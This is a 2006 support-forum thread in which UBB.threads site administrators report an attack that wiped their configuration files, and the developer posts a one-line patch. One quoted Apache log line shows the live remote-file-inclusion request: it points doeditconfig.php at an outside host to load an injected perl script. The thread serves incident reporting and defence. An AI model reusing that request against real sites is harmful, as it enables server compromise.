Site Links
Home
Features
Documentation
Pricing & Order
Members Area
Support Options
Who's Online
3 registered (Morgan, Rick, Ultimatelunker), 32 Guests and 20 Spiders online.
Key: Admin, Global Mod, Mod
Featured Member
Registered: 08/30/06
Posts: 1256
Top Posters (30 Days)
Rick 110
Gizmo 99
Thelockman 56
driv 53
AllenAyres 40
Morgan 37
ntdoc 32
flyboy105 31
blaaskaak 29
ScriptKeeper 27
Latest Photos
XTERRA K9 Challenge
DEG Metro Stars: Jamie Storr
My new girlfriend
testing photo upload in ie7
Fall foilage in New England
Topic Options
Rate This Topic
#130034 - 09/30/06 02:28 AM security flaw in doedittheme.php and doeditconfig.php
RSchiffman Offline
stranger

Registered: 05/03/06
Posts: 6
There is a flaw in doedittheme.php and doeditconfig.php. The symptom is that the config.inc.php gets mostly truncated and the board is blank because it can't connect to the DB. The appropriate line in the apache log is:
158.39.35.18 - - [30/Sep/2006:00:29:13 -0700] "GET /ubb/admin/doeditconfig.php?thispath=../includes&config[path]=http://abok.us/cmd
.gif? HTTP/1.1" 200 171 "-" "libwww-perl/5.65"

and

It also takes place with doedittheme as well. This is being run from multiple locations. We had a different one from spain with as well. I'm running 6.5.1 with the other security hold fixed manually. I'll update to 6.5.5, but I didn't see anything to indicate that this is fixed in the update.

Top
#130035 - 09/30/06 02:45 AM Re: security flaw in doedittheme.php and doeditconfig.php
RSchiffman Offline
stranger

Registered: 05/03/06
Posts: 6
The gif file injects a perl script. I have a copy of the script if you need it. I will be gone today, but I can do it tomorrow if you need.

Top
#130036 - 09/30/06 07:29 AM Re: security flaw in doedittheme.php and doeditconfig.php
Rick Administrator Online   sleepy

*****

Registered: 06/04/06
Posts: 7689
Loc: Aberdeen, WA
This was fixed in either 6.5.4 or 6.5.5. Basically each of these scripts needs this line at the top after the block of header comments. This keeps these scripts from being called directly.

if (!defined('IS_ADMIN')) exit;

You probably got hit from multiple locations because this was reposted on bugtraq yesterday. It's the same description of the exploit that was posted a few months back when we put out 6.5.4 and 6.5.5.
_________________________
UBB.threads™ Developer
My Personal Website · StogieSmokers.com

Top
#130037 - 09/30/06 10:19 AM Re: security flaw in doedittheme.php and doeditconfig.php
JoshPet Offline
enthusiast

Registered: 06/05/06
Posts: 292
Loc: Charlotte, NC
Ah - yeah, I've had 4 or 5 clients hit with this today, this explains why the hacks are coming out of the woodwork. Thanks for the fix.
_________________________
Joshua Pettit
Web Developer
www.ThreadsDev.net | www.JoshuaPettit.com

Top
#130038 - 10/01/06 04:46 PM Re: security flaw in doedittheme.php and doeditconfig.php
Bonny Offline
stranger

Registered: 10/01/06
Posts: 1
6.5.5?? The "Version notes" on the website only go up to 6.5.2, which is what we're running - have these not been updated? We've been hit with this same exploit.

Top
#130039 - 10/01/06 07:04 PM Re: security flaw in doedittheme.php and doeditconfig.php
Rick Administrator Online   sleepy

*****

Registered: 06/04/06
Posts: 7689
Loc: Aberdeen, WA
It looks like the version notes haven't been updated. We did send out an email to all of our customers trying to make sure that everyone got notified of the problem and that an upgrade was available.
_________________________
UBB.threads™ Developer
My Personal Website · StogieSmokers.com

Top


Shout Box

Today's Birthdays
The Spin Master
Recent Topics
Subject line and Watched topics in Quick Reply form?
by medencev
Today at 06:35 AM
Moderators can't read despite the moderators settings are ok
by Morgan
Today at 03:14 AM
login and no permission issue
by Morgan
Today at 02:58 AM
Looking for Russian v7.3.1
by medencev
Today at 12:52 AM
Global Moderator problem
by Darryl
Yesterday at 10:04 PM
Forum Stats
4093 Members
33 Forums
30216 Topics
152996 Posts

Max Online: 978 @ 06/24/07 08:19 PM